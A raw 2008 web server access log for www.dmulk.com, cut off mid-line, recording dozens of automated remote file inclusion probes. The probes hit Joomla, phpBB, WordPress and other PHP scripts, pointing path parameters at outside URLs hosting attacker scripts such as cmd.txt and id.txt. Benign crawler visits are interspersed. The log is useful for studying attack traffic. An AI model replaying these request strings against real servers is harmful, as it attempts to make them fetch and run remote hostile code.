208.67.83.25 - - [26/Feb/2008:12:58:30 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:12:58:41 -0800] "GET /logs/access_080108.log//?NWCONF_SYSTEM[server_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.25.34 - - [26/Feb/2008:12:59:03 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
65.98.25.34 - - [26/Feb/2008:12:59:03 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:12:59:15 -0800] "GET /logs/access_080120.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:12:59:59 -0800] "GET /logs/access.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:13:00:00 -0800] "GET /logs/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.35 - - [26/Feb/2008:13:00:06 -0800] "GET /logs/show.php?path=http://www.elitesense.com/spider/newnudecash/sistem.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
64.185.237.35 - - [26/Feb/2008:13:00:11 -0800] "GET /show.php?path=http://www.elitesense.com/spider/newnudecash/sistem.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:13:00:17 -0800] "GET /logs/access_080119.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.176 - - [26/Feb/2008:13:01:41 -0800] "GET /logs/access_080122.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.35 - - [26/Feb/2008:13:01:42 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.elitesense.com/spider/newnudecash/sistem.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.185.237.35 - - [26/Feb/2008:13:01:42 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.elitesense.com/spider/newnudecash/sistem.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
83.172.140.17 - - [26/Feb/2008:13:02:43 -0800] "GET /modules/block_media/util.media.php?GLOBALS[where_cms]=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.193.98 - - [26/Feb/2008:13:02:43 -0800] "GET /!scanhttp://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [26/Feb/2008:13:02:57 -0800] "GET /index.php?sourcedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.193.215.56 - - [26/Feb/2008:13:02:57 -0800] "GET /logs/index.php?sourcedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.18.66 - - [26/Feb/2008:13:03:18 -0800] "GET /logs/access_071216.log//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Feb/2008:13:03:18 -0800] "GET //tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Feb/2008:13:03:18 -0800] "GET /logs//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:13:03:41 -0800] "GET /logs/access_080107.log//?NWCONF_SYSTEM[server_path]=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:13:03:41 -0800] "GET /logs//?NWCONF_SYSTEM[server_path]=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 200 36264 "-" "libwww-perl/5.805" "www.dmulk.com"
38.99.154.68 - - [26/Feb/2008:13:03:53 -0800] "GET /logs/access_080106.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [26/Feb/2008:13:04:14 -0800] "GET /index.php?option=com_docman&task=doc_download&gid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
84.19.178.201 - - [26/Feb/2008:13:04:15 -0800] "GET /logs/index.php?option=com_docman&task=doc_download&gid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:13:04:22 -0800] "GET /logs/access_080108.log//?NWCONF_SYSTEM[server_path]=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.193.98 - - [26/Feb/2008:13:04:44 -0800] "GET /logs/access_080117.log/!scanhttp://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.193.98 - - [26/Feb/2008:13:04:44 -0800] "GET /logs/!scanhttp://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [26/Feb/2008:13:04:45 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.150.78.201 - - [26/Feb/2008:13:04:45 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.19.18.66 - - [26/Feb/2008:13:04:56 -0800] "GET /logs/access_080130.log//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.25.34 - - [26/Feb/2008:13:05:13 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.98.25.34 - - [26/Feb/2008:13:05:13 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [26/Feb/2008:13:05:19 -0800] "GET //tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:13:05:28 -0800] "GET /admin/index.php?o=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:13:05:28 -0800] "GET /admin/index.php?o=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.193.98 - - [26/Feb/2008:13:05:38 -0800] "GET /logs/access_080211.log/!scanhttp://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:13:07:08 -0800] "GET /logs/access_080120.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
158.38.0.218 - "" [26/Feb/2008:13:07:10 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "boitho.com-dc/0.86 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
200.69.222.121 - - [26/Feb/2008:13:08:48 -0800] "GET /logs/access.log/index.php?sourcedir=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [26/Feb/2008:13:08:49 -0800] "GET /index.php?sourcedir=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [26/Feb/2008:13:08:52 -0800] "GET /logs/index.php?sourcedir=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.85.52.146 - - [26/Feb/2008:13:09:34 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.maxima-fm.com.mx/guadalajara/promos/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.77.182.148 - - [26/Feb/2008:13:10:48 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
222.77.182.148 - - [26/Feb/2008:13:10:50 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:13:11:34 -0800] "GET /index.php?sourcedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.69.222.121 - - [26/Feb/2008:13:11:54 -0800] "GET /logs/access_080122.log/index.php?sourcedir=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:13:13:19 -0800] "GET /logs/access.log/index.php?sourcedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:13:13:19 -0800] "GET /index.php?sourcedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:13:13:19 -0800] "GET /logs/index.php?sourcedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [26/Feb/2008:13:13:25 -0800] "GET /logs/access.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [26/Feb/2008:13:13:25 -0800] "GET /logs/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:13:13:55 -0800] "GET /?M=D HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:13:14:56 -0800] "GET /logs/access_071216.log//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:13:14:56 -0800] "GET //tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:13:14:59 -0800] "GET /logs/access_080122.log/index.php?sourcedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:13:15:00 -0800] "GET /logs//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.33.49.76 - - [26/Feb/2008:13:16:14 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.elitesense.com/spider/newnudecash/sistem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
64.33.49.76 - - [26/Feb/2008:13:16:14 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.elitesense.com/spider/newnudecash/sistem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:13:16:54 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:13:16:54 -0800] "GET /logs/admin/index.php?o=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:13:16:56 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:13:16:57 -0800] "GET /logs/admin/index.php?o=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.232 - - [26/Feb/2008:13:18:34 -0800] "GET /bikes/ HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:13:19:54 -0800] "GET /logs/access_080130.log//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.203 - - [26/Feb/2008:13:20:54 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 9501 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.67.83.25 - - [26/Feb/2008:13:21:17 -0800] "GET /logs/access_080120.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:21:41 -0800] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:21:47 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:21:48 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.208.81.132 - - [26/Feb/2008:13:22:16 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.92.222.169 - - [26/Feb/2008:13:22:38 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
81.92.222.169 - - [26/Feb/2008:13:22:38 -0800] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:13:22:51 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:13:22:52 -0800] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:13:23:20 -0800] "GET //tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:13:23:29 -0800] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.178.201 - - [26/Feb/2008:13:23:46 -0800] "GET /logs/index.php?option=com_docman&task=doc_download&gid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.30.216.102 - - [26/Feb/2008:13:23:46 -0800] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.19.178.201 - - [26/Feb/2008:13:23:46 -0800] "GET /index.php?option=com_docman&task=doc_download&gid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:13:26:37 -0800] "GET /logs/access.log/index.php?sourcedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:13:26:38 -0800] "GET /index.php?sourcedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:13:26:38 -0800] "GET /logs/index.php?sourcedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.208.81.132 - - [26/Feb/2008:13:26:42 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [26/Feb/2008:13:26:45 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.140.17 - - [26/Feb/2008:13:26:49 -0800] "GET /logs/access.log/modules/block_media/util.media.php?GLOBALS[where_cms]=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.140.17 - - [26/Feb/2008:13:26:49 -0800] "GET /logs/modules/block_media/util.media.php?GLOBALS[where_cms]=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:13:27:16 -0800] "GET /logs/access_080122.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:13:27:27 -0800] "GET /logs/access_080201.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.193.98 - - [26/Feb/2008:13:27:33 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.7.139 - - [26/Feb/2008:13:29:02 -0800] "GET /bikes/dteel/2008_02_23/ HTTP/1.0" 200 1540 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
221.143.49.246 - - [26/Feb/2008:13:29:41 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
221.143.49.246 - - [26/Feb/2008:13:29:41 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:32:09 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:32:14 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:32:15 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:13:32:25 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:13:32:25 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
81.92.222.169 - - [26/Feb/2008:13:33:08 -0800] "GET /update5.php?lang=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.92.222.169 - - [26/Feb/2008:13:33:09 -0800] "GET /logs/update5.php?lang=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:13:33:50 -0800] "GET /logs/access_080120.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:13:33:50 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:13:33:51 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:13:33:54 -0800] "GET /logs/update5.php?lang=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:13:33:55 -0800] "GET /update5.php?lang=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:34:10 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:34:39 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:34:40 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:34:40 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.14.49.138 - - [26/Feb/2008:13:34:43 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:13:34:59 -0800] "GET //?NWCONF_SYSTEM[server_path]=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.79" "www.dmulk.com"
209.208.81.132 - - [26/Feb/2008:13:35:46 -0800] "GET /administrator/components/com_jcs/views/repo